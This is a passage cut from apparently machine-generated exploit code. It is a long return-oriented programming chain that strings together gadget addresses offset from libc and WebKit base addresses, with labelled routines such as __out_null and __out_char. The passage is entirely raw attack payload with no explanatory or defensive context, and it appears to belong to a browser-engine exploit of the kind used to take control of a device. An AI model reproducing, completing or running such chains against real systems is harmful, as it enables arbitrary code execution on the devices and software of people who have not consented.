//L2397: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2398: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+163664, //L2400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2400: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+163792, //L2402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+163808, //L2403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+163776, //L2401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2401: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2402: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2403: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+163888, //L2404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+163904, //L2405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2405: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+164064, //L2409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+164032, //L2407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+164048, //L2408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2406: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2407: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2408: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2409: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+164120, //L2411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2411: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+164248, //L2413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+164264, //L2414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+164232, //L2412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2412: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2413: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2414: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+164360, //L2416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+164344, //L2415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2415: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2416: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+164440, //L2417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2417: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2419: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+164560, //L2422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+164544, //L2420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2420: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2422: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+164704, //L2425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+164672, //L2423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+164688, //L2424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2423: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2424: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2425: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+164776, //L2427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2427: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+164832, //L2428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2428: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+164912, //L2430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2430: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2432: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+165032, //L2435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+165016, //L2433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2433: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2435: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+165144, //L2436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+165176, //L2438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+165160, //L2437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2436: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2437: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2438: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+165264, //L2440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2440: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+165320, //L2441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2441: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+165392, //L2444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2444: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+165448, //L2445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2445: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L2374: libc_base+764760, //pop rsi ropchain+165576, //L2448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+165560, //L2447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2447: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2448: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+165680, //L2449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+165696, //L2450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2449: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2450: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+165816, //L2451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+165800, //L2452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2452: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2451: db([0, 0]); // 0x0 //__out_null: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+165888, //L2454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2454: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+165984, //L2455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166016, //L2458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2455: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2457: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L2458: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+166120, //L2461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166104, //L2459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2459: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2461: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+166280, //L2465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166248, //L2463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+166264, //L2464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2462: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2463: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2464: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2465: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+166336, //L2467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2467: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+166464, //L2469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+166480, //L2470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+166448, //L2468 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2468: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2469: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2470: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+166568, //L2471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+166584, //L2473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2471: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2473: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2474: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+166704, //L2477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166688, //L2475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2475: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2477: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+166792, //L2478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+166808, //L2480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2478: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2480: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2481: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+166928, //L2484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+166912, //L2482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2482: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2484: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+167016, //L2485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+167032, //L2487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2485: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2487: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2488: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+167152, //L2491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+167136, //L2489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2489: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2491: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+167296, //L2494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+167264, //L2492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+167280, //L2493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2492: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2493: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2494: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+167400, //L2495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+167416, //L2496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2495: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2496: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+167536, //L2497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+167520, //L2498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2498: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2497: db([0, 0]); // 0x0 //__out_char: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+167608, //L2500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2500: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+167704, //L2501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+167736, //L2504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2501: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2503: db([24, 0]); // 0x18 set_gadget(webkit_base+568675,); //pop r8 //L2504: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+167840, //L2507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+167824, //L2505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2505: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2507: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+167928, //L2508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+167944, //L2510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2508: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2510: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2511: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+168064, //L2514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+168048, //L2512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2512: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2514: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+168152, //L2515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+168168, //L2517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2515: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2517: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2518: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+168288, //L2521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+168272, //L2519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2519: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2521: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+168376, //L2522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+168392, //L2524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2522: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2524: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2525: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+168512, //L2528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+168496, //L2526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2526: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2528: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+168672, //L2532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+168640, //L2530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+168656, //L2531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2529: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2530: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2531: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2532: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+168728, //L2534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2534: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+168856, //L2536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+168872, //L2537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+168840, //L2535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2535: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2536: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2537: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+169032, //L2541 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+169000, //L2539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+169016, //L2540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2538: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2539: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2540: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2541: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+169088, //L2543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2543: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+169216, //L2545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+169232, //L2546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+169200, //L2544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2544: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2545: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2546: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+169344, //L2548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+169392, //L2551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+169360, //L2549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2548: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2549: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2550: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2551: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+169504, //L2552+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+169496, //L2552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2552: db([0, 0]); // 0x0 set_gadgets([ ropchain+169520, //L2552+24 ropchain+170728, //L2547 libc_base+764760, //pop rsi ropchain+169560, //L2553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2553: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2555: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+169680, //L2558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+169664, //L2556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2556: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2558: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+169840, //L2562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+169808, //L2560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+169824, //L2561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2559: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 